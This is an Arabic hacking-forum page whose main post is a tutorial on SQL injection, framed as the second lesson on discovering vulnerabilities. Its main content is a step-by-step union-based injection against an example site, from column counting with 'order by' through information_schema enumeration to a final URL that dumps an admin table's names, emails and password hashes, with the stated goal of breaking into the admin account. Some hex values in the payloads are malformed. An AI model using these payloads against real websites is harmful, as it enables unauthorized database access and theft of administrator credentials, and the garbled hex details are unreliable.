منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
عزيزي الزائر عزيزتي الزائرة يرجي التكرم بتسجبل الدخول
لي اجل تستطيع اطهار جميع المواضيع والاقسام
اذا كنت عضو معنا

او التسجيل ان لم تكن عضو وترغب في الانضمام الي المنتدي

نتشرف بتسجيل

ادارة المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
عزيزي الزائر عزيزتي الزائرة يرجي التكرم بتسجبل الدخول
لي اجل تستطيع اطهار جميع المواضيع والاقسام
اذا كنت عضو معنا

او التسجيل ان لم تكن عضو وترغب في الانضمام الي المنتدي

نتشرف بتسجيل

ادارة المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقاأكبر منتدى هكر عربي متخصص بجديد الثغرات واختراق المواقع والأجهزة.منتدى إختراق البريد والايميلات- قسم اختراق دورة إحتراف التلغيمدورة اختراق IPs من نوع SIPو VOIP‎دورة كشف التلغيم‎دورة اختراق الأجهزة‎دورة
 
الرئيسيةأحدث الصورالتسجيلدخول


تحياتي لك الباب مفتوح لي في جميع الاقسام الذي تريده عند المشاركه  اي استفسار انا جاهز ان شاء الله
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
سحابة الكلمات الدلالية
المواضيع الأخيرة
» انشاء ./payload
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالأربعاء أغسطس 11, 2021 12:03 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» دروس تعلم فنون الهكرز للمبتدئين
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالجمعة ديسمبر 29, 2017 1:33 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» اقوى كود ازالة حسابات الفيس بوك
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالجمعة ديسمبر 29, 2017 1:27 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» عملاق التحميل من التورنت Vuze 5.6.0.0 الجديد كليا واحدث الادوات والاصدرات
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالسبت مارس 07, 2015 11:36 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» برنامج FastPictureViewer 1.9 Build 342 لتعديل و عرض الصور بكل سهوله
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالأربعاء مارس 04, 2015 3:57 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» احدث فلود اضافات روم 2015
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالأربعاء مارس 04, 2015 10:20 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]VB6[ أفضل الطرق لتجميل برامجك شبكة الجنرال صدام الشرعبي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالثلاثاء مارس 03, 2015 10:58 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثالث -الجمل الشرطية و الدوارات شبكة الجنرال صدام الشرعبي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالثلاثاء مارس 03, 2015 10:55 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثاني -المتغيرات شبكة الجنرال صدام الشرعبي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالثلاثاء مارس 03, 2015 10:53 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ الدرس الاول تعلم خطوة بخطوة , مع الإجابة عن أي سؤال شبكة الجنرال صدام الشرعبي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالثلاثاء مارس 03, 2015 10:52 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الثانية اضافةالبيانات بالـ LINQ شبكة الجنرال صدام الشرعبي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالثلاثاء مارس 03, 2015 10:47 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الاولى لأستيعاب الـ LINQ شبكة الجنرال صدام الشرعبي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالثلاثاء مارس 03, 2015 10:45 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ عمل برامج للاجهزه النقاله والPDA‏ شبكة الجنرال صدام الشرعبي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالثلاثاء مارس 03, 2015 10:41 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

نوفمبر 2024
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
    123
45678910
11121314151617
18192021222324
252627282930 
اليوميةاليومية
التبادل الاعلاني

انشاء منتدى مجاني



أفضل 10 فاتحي مواضيع
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
جنـرال الـهكـر
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
رابح..زيرؤ.فؤر.ايفر
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
ابوعلي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
سنايبر1
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
ملك الهكر
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
العاشق
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
الساحر
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
__alsafa7__
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
صدام الشرعبي
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
أفضل 10 أعضاء في هذا المنتدى
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے - 1851
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
رابح..زيرؤ.فؤر.ايفر - 300
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
جنـرال الـهكـر - 227
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
سنايبر1 - 146
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
ابوعلي - 55
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
العاشق - 49
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
نسيـم البحـر1 - 27
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
ملك الهكر - 27
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
لووورد اليمن - 24
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
__alsafa7__ - 18
الدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_rcap1الدرس ثاني-كيفية كتشاف ثغرات جزء اول Voting_barالدرس ثاني-كيفية كتشاف ثغرات جزء اول Vote_lcap1 
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية reddit      

https://sadam-alsharabi.roo7.biz

قم بحفض و مشاطرة الرابط منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات على موقع حفض الصفحات
تصويت
احصائيات
هذا المنتدى يتوفر على 2284 عُضو.
آخر عُضو مُسجل هو Mahrr فمرحباً به.

أعضاؤنا قدموا 3052 مساهمة في هذا المنتدى في 2055 موضوع

 

 الدرس ثاني-كيفية كتشاف ثغرات جزء اول

اذهب الى الأسفل 
كاتب الموضوعرسالة
جنـرال الـهكـر

جنـرال الـهكـر


السٌّمعَة : 4
تاريخ التسجيل : 20/04/2014
الموقع : https://sadam-alsharabi.roo7.biz

الدرس ثاني-كيفية كتشاف ثغرات جزء اول Empty
مُساهمةموضوع: الدرس ثاني-كيفية كتشاف ثغرات جزء اول   الدرس ثاني-كيفية كتشاف ثغرات جزء اول Icon_minitimeالثلاثاء مايو 13, 2014 10:52 am

بسم الله الرحمن الرحيم‎

اليوم و في درسنا هذا ريحين نشرح كيفية اكتشاف الثغرات خطوة بخطوة

لتعريف Sql injection : وهي ثغرات تحدث في حال إدخال متغير ما على إستعلام (query) للغة قواعد البيانات mysql ومن ثم توجيه إستعلامات مخصصه لإستغلال مثل هذه الثغرات لنحصل على الهدف النهائي وهو إستخراج المعلومات من قاعدة البيانات بشكل كامل و  غير شرعي , ويوجد للثغرة عدة لنذكر إثنين منها : 

    error based sql injection
    blind sql injection

في النوع الأول يكون إستغلال الثغرة ميسر ومن دون اي مشاكل وبسرعه تامه.

اما في النوع الثاني تكون المشاكل في تخمين إسم ونوع الجداول والصفوف مما يؤدي إلا تأخر العمليه (ولكنها تتم بالنهاية).

ومن الجدير بالذكر أيضاً أن هذه الثغرات تستهدف الكثير من اللغات البرمجية مثل php , java , asp , aspx.

نبدء في طريقة White Box والتي سوف نقوم بشرح أكودا الثغرة المكتوبه بلغة Php بالإعتماد على لغة Mysql


[sor2]http://upload.sa3eka.com/do.php?img=4171[/sor2]

نلاحظ في الصورة السابقه ولنشرح المكونات

    السكربت يعمل إدراج لملف config.php والذي يتصل بدورة بقواعد البيانات.
    السطر رقم 5 نلاحظ تعريف المتغير name بالقيمه المدخله من نوع POST والتي تتمثل بالحقل name.
    بالسطر رقم 7 نلاحظ عمل إستعلام (mysql query ) والذي يحاول إختيار جميع الحقول الموجوده في الجدول name ومطابقتها مع المتغير.
    بالسطر رقم 14 نشاهد عنوان ومعلومات النموذج (form) وهي قيمه POST كوسيلة لإرسال البيانات ومعالجتها بملف index.php.

لنأتي الأن لشرح تفاصيل الثغرة ومعرفة كيفية حدوثها , نشاهد أن المتغير لم يفلتر ولم يحدد ما هو من قبل المبرمج لذلك يسمع بإدخال جميع الأوامر والتعابير إلى الإستعلام مما يمكن حقن كود يؤدي لحدوث خطأ ينتج عنه ثغرة sql injection يؤدي إلى إستخراج جميع المعلومات الموجوده في خادم قواعد البيانات. هكذا نكون فسرنا الكود وإكتشفنا الثغرة الموجوده بالسكربت بكل سهوله من خلال قرأة المدخلات والتحقق من عدم فلترتها.

الأن لنأتي إلى إستكشاف الصفحه ومن ثم محاولة إستغلال الثغرة, لنلقي الأن نظرة على الفورم من خلال هذه الصورة


[sor2]http://upload.sa3eka.com/do.php?img=4172[/sor2]


نلاحظ وجود فورم بسيط , لنحاول إدخال أي قيمه لنلاحظ ان الفورم لم يحرك ساكن ! ممتاز لنحاول الأن إدخال علامه (‘) single quote ومن ثم ملاحظه ما سوف يحدث من خلال هذه الصورة

[sor2]http://upload.sa3eka.com/do.php?img=4173[/sor2]


حلو الكلام 

وفي طريقة اليدوية يعني بدون برامج مثلا

نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

الكود:
order by 1-- 
  
order by 5-- 
  
order by 10-- 
  
order by 15--
[color][size]


لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا


[/size][/color]
الكود:
order by 1/*  
[color][size]


order by 15--

هنا ظهر الخطأ 

النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

[/size][/color]يصير الرابط هيك

الكود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

  




الان لنعرف اصدار القاعده
نكتب

الكود:
version()  



بعض الاوامر


database()
version()
user()
الان نضيف  للحقنه 
 
الكود:
concat(table_name,0x3a,column_name,0x3a,table_schema)  


الكود:
+from+information_schema.columns--  


فتصبح



الكود:
 
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns--  



الان نضيف الامر التالي

[sor2]http://upload.sa3eka.com/do.php?img=4174[/sor2]


ههههههههه تفائلو

الكود:
 
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37) 



الكود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--  



شوف اخي اطلع ع النتائج بتلقى الجداول المهمه هي
الادمن
اليوزر
بس احنا بدنا نخترق الادمن وهو المتوقع هدفنا يلا نصيده

SurveyAdmins:admin_password:SURVEYS
SurveyAdmins:admin_md5_password:SURVEYS


 انتو شايفين عنا خيارين  الاول هو الي مطلوب نشوف كيف نعمل
ندخل لي هذا الموقع

الكود:
http://www.waraxe.us/sql-char-encoder.html  


تشفير اسم الجدول وعنا اسم الجدول هو   مثلا    SurveyAdmins نوع التشفير هو  مثلا


الكود:
MySql hex-encoded string  



يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر   where+table_name=  يعني هيك

الكود:
where+table_name=0x15248796335b5tr55  



الاستغلال

 
الكود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x0x15248796335b5tr55--  




ما شاء الله طلع لنا خيارات كثيره   الان خلينا نجمع الاستغلال  اسم الجدول  SurveyAdmins  

 نجمعها كلها مع بعض بالامر  concat   وبتصير هيك  concat(name,0x3a,pass)[/COLOR]
الكود:
 ;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm;  

نجمعهم الامر

الكود:
concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm)  


نركبه بالحقنه

الكود:
http://www.the--king.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins--  



[COLOR="DarkOrange"][SIZE="4"]انتهى الجزء اول من شرح ثغرات انتضرونا في الحلقة القادمة ان شاءالله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
الدرس ثاني-كيفية كتشاف ثغرات جزء اول
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» الدرس ثاني-كيفية كتشاف ثغرات جزء اول
» الدرس ثاني-كيفية كتشاف ثغرات جزء اول
» الدرس ثاني جزء 2-كشف الثغرات بي الفيديو
» الدرس ثاني جزء 2-كشف الثغرات بي الفيديو
» الدرس ثاني جزء 2-كشف الثغرات بي الفيديو

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات :: الفئة الأولى :: قسم اختراق المواقع وسيرفرات-
انتقل الى: